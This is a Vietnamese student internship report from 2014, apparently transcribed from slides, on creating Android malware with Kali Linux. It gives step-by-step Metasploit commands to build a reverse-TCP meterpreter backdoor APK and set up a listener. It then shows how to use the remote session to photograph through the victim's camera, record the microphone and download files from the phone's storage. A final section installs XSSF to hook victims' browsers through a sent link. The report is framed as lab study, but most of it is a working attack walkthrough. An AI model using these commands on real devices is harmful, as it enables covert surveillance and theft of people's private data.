Tuần 3 tạo mã độc trên kali linux

18
BÁO CÁO THỰC TẬP Tuần 3 Đề tài: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài Sinh viên thực hiện: Tô Thị Hường GVHD: Thy Võ Đỗ Thng TP.HCM, ngày 25 tháng 7 năm 2014

Transcript of Tuần 3 tạo mã độc trên kali linux

Page 1: Tuần 3   tạo mã độc trên kali linux

BÁO CÁO THỰC TẬP – Tuần 3

Đề tài:

Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ

liệu như danh sách contact, tin nhắn trên điện thoại sử

dụng Android và gửi ra ngoài

Sinh viên thực hiện: Tô Thị Hường

GVHD: Thầy Võ Đỗ Thắng

TP.HCM, ngày 25 tháng 7 năm 2014

Page 2: Tuần 3   tạo mã độc trên kali linux

Nội dung: Tạo mã độc trên Kali Linux để xâm

nhập Android

1. Tạo lập Backdoor

Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở

payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware, ta nên

thiết lập phần Network như sau:

Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware

Bấm vào Network Adapter và chọn NAT:Used to share the host’s IP address

Page 3: Tuần 3   tạo mã độc trên kali linux

Bấm vào Edit -> Virtual Network Editor...

Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật

Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android

Page 4: Tuần 3   tạo mã độc trên kali linux

Đầu tiên mở terminal và gõ dòng lệnh: msfpayload android/meterpreter/reverse_tcp

lhost=192.168.220.128 lport=8080 R > /root/Desktop/app.apk

192.168.220.128 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP của máy Kali

8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng

Page 5: Tuần 3   tạo mã độc trên kali linux

Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp

backdoor.

Tiếp theo, gõ lệnh msfconsole

Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên.

set lport 8080 – nhập port giống với port khi tạo payload ở trên.

Page 6: Tuần 3   tạo mã độc trên kali linux

Exploit

Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.

Thử với một máy Google Nexus giả lập, tải về app.apk, cài đặt và mở lên được giao diện như dưới,

nhấp vào nút reverse_tcp:

Page 7: Tuần 3   tạo mã độc trên kali linux

Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:

Để xem thông tin về máy, nhập lệnh SysInfo

Sử dụng camera:

Để xem danh sách camera, nhập webcam_list

Page 8: Tuần 3   tạo mã độc trên kali linux

Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở

phần trước. Ví dụ như sau:

File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của máy

Page 9: Tuần 3   tạo mã độc trên kali linux

Ghi âm

Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy

Page 10: Tuần 3   tạo mã độc trên kali linux

Lấy file từ sd card

Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục

Ví dụ ở đây, ta tải file app.apk trong thư mục download của sdcard

Page 11: Tuần 3   tạo mã độc trên kali linux

Dùng lệnh cd /sdcard/Download để vào thư mục

Page 12: Tuần 3   tạo mã độc trên kali linux

Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh

Download App.apk

Và file này sẽ được tải về thư mục root của máy Kali

2. XSSF

Để cài đặt XSSF cho kali sử sụng 3 câu lệnh:

msfupdate

cd /opt/metasploit/apps/pro/msf3

svn export http://xssf.googlecode.com/svn/trunk ./ --force

Page 13: Tuần 3   tạo mã độc trên kali linux
Page 14: Tuần 3   tạo mã độc trên kali linux

Tiếp theo là lệnh: xssf_urls

XSSF LOG PAGE : http://192.168.220.128:80/xssf/gui.html?guipage=main

Địa chỉ gửi cho nạn nhân là: http://192.168.220.128:80/xssf/test.html

Page 15: Tuần 3   tạo mã độc trên kali linux

Kết quả trên terminal:

Lệnh xssf_victim dùng để hiện thông tin nạn nhân

Lệnh xssf_information dùng để hiện thông tin nạn nhân chi tiết hơn

Page 16: Tuần 3   tạo mã độc trên kali linux

Tiếp tục lệnh search auxiliary/xssf

Page 17: Tuần 3   tạo mã độc trên kali linux

Refesh lại trang web sẽ thấy thông tin nạn nhân

Tiếp theo sử dụng lệnh alert để cảnh báo nạn nhân:

Page 18: Tuần 3   tạo mã độc trên kali linux